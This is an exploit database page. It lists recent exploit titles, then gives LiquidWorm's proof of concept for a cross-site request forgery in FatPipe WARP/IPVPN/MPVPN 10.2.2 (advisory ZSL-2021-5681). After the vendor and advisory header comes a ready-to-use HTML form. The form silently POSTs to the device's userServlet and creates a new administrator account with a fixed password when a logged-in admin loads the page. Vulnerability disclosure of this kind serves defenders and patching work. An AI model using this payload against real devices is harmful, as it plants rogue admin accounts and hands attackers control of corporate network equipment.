
58 changes to exploits/shellcodes Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated) ProFTPD 1.3.7a - Remote Denial of Service glFTPd 2.11a - Remote Denial of Service Hasura GraphQL 1.3.3 - Denial of Service Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC) NBMonitor 1.6.8 - Denial of Service (PoC) Nsauditor 3.2.3 - Denial of Service (PoC) Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC) Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC) Post-it 5.0.1 - Denial of Service (PoC) Notex the best notes 6.4 - Denial of Service (PoC) SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC) Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC) GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC) GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC) GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC) Backup Key Recovery 2.2.7 - Denial of Service (PoC) memono Notepad Version 4.2 - Denial of Service (PoC) Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path Cyberfox Web Browser 52.9.1 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access vsftpd 3.0.3 - Remote Denial of Service Dlink DSL2750U - 'Reboot' Command Injection PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS) Netsia SEBA+ 0.16.1 - Add Root User (Metasploit) Arteco Web Client DVR/NVR - 'SessionId' Brute Force Resumes Management and Job Application Website 1.0 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated) 'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1) Mini Mouse 9.3.0 - Local File inclusion rconfig 3.9.6 - Arbitrary File Upload Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS) Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated) OpenEMR 5.0.1.3 - Authentication Bypass VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS) Patient Appointment Scheduler System 1.0 - Persistent Cross-Site Scripting Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection Budget and Expense Tracker System 1.0 - Authenticated Bypass Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) Blood Bank System 1.0 - Authentication Bypass Lodging Reservation Management System 1.0 - Authentication Bypass Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read Linux/x64 - /sbin/halt -p Shellcode (51 bytes) Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2) Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded) Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
108 lines
No EOL
3.9 KiB
Text
108 lines
No EOL
3.9 KiB
Text
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)
|
|
# Date: 25.07.2021
|
|
# Exploit Author: LiquidWorm
|
|
# Vendor Homepage: https://www.fatpipeinc.com
|
|
|
|
<!--
|
|
|
|
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 CSRF Add Admin Exploit
|
|
|
|
|
|
Vendor: FatPipe Networks Inc.
|
|
Product web page: https://www.fatpipeinc.com
|
|
Affected version: WARP / IPVPN / MPVPN
|
|
10.2.2r38
|
|
10.2.2r25
|
|
10.2.2r10
|
|
10.1.2r60p82
|
|
10.1.2r60p71
|
|
10.1.2r60p65
|
|
10.1.2r60p58s1
|
|
10.1.2r60p58
|
|
10.1.2r60p55
|
|
10.1.2r60p45
|
|
10.1.2r60p35
|
|
10.1.2r60p32
|
|
10.1.2r60p13
|
|
10.1.2r60p10
|
|
9.1.2r185
|
|
9.1.2r180p2
|
|
9.1.2r165
|
|
9.1.2r164p5
|
|
9.1.2r164p4
|
|
9.1.2r164
|
|
9.1.2r161p26
|
|
9.1.2r161p20
|
|
9.1.2r161p17
|
|
9.1.2r161p16
|
|
9.1.2r161p12
|
|
9.1.2r161p3
|
|
9.1.2r161p2
|
|
9.1.2r156
|
|
9.1.2r150
|
|
9.1.2r144
|
|
9.1.2r129
|
|
7.1.2r39
|
|
6.1.2r70p75-m
|
|
6.1.2r70p45-m
|
|
6.1.2r70p26
|
|
5.2.0r34
|
|
|
|
Summary: FatPipe Networks invented the concept of router-clustering,
|
|
which provides the highest level of reliability, redundancy, and speed
|
|
of Internet traffic for Business Continuity and communications. FatPipe
|
|
WARP achieves fault tolerance for companies by creating an easy method
|
|
of combining two or more Internet connections of any kind over multiple
|
|
ISPs. FatPipe utilizes all paths when the lines are up and running,
|
|
dynamically balancing traffic over the multiple lines, and intelligently
|
|
failing over inbound and outbound IP traffic when ISP services and/or
|
|
components fail.
|
|
|
|
FatPipe IPVPN balances load and provides reliability among multiple
|
|
managed and CPE based VPNs as well as dedicated private networks. FatPipe
|
|
IPVPN can also provide you an easy low-cost migration path from private
|
|
line, Frame or Point-to-Point networks. You can aggregate multiple private,
|
|
MPLS and public networks without additional equipment at the provider's
|
|
site.
|
|
|
|
FatPipe MPVPN, a patented router clustering device, is an essential part
|
|
of Disaster Recovery and Business Continuity Planning for Virtual Private
|
|
Network (VPN) connectivity. It makes any VPN up to 900% more secure and
|
|
300% times more reliable, redundant and faster. MPVPN can take WANs with
|
|
an uptime of 99.5% or less and make them 99.999988% or higher, providing
|
|
a virtually infallible WAN. MPVPN dynamically balances load over multiple
|
|
lines and ISPs without the need for BGP programming. MPVPN aggregates up
|
|
to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
|
|
you need to keep your VPN up and running despite failures of service, line,
|
|
software, or hardware.
|
|
|
|
Desc: The application interface allows users to perform certain actions via
|
|
HTTP requests without performing any validity checks to verify the requests.
|
|
This can be exploited to perform certain actions with administrative privileges
|
|
if a logged-in user visits a malicious web site.
|
|
|
|
Tested on: Apache-Coyote/1.1
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2021-5681
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5681.php
|
|
|
|
|
|
30.05.2016
|
|
25.07.2021
|
|
|
|
-->
|
|
|
|
|
|
<html>
|
|
<body>
|
|
<form action="https://10.0.0.7/fpui/userServlet?loadType=set&block=userSetRequest" method="POST">
|
|
<input type="hidden" name="userList" value='[{"userName":"adminz","privilege":"1","password":"TestPwd17","action":"add","state":false}]' />
|
|
<input type="submit" value="Submit" />
|
|
</form>
|
|
</body>
|
|
</html> |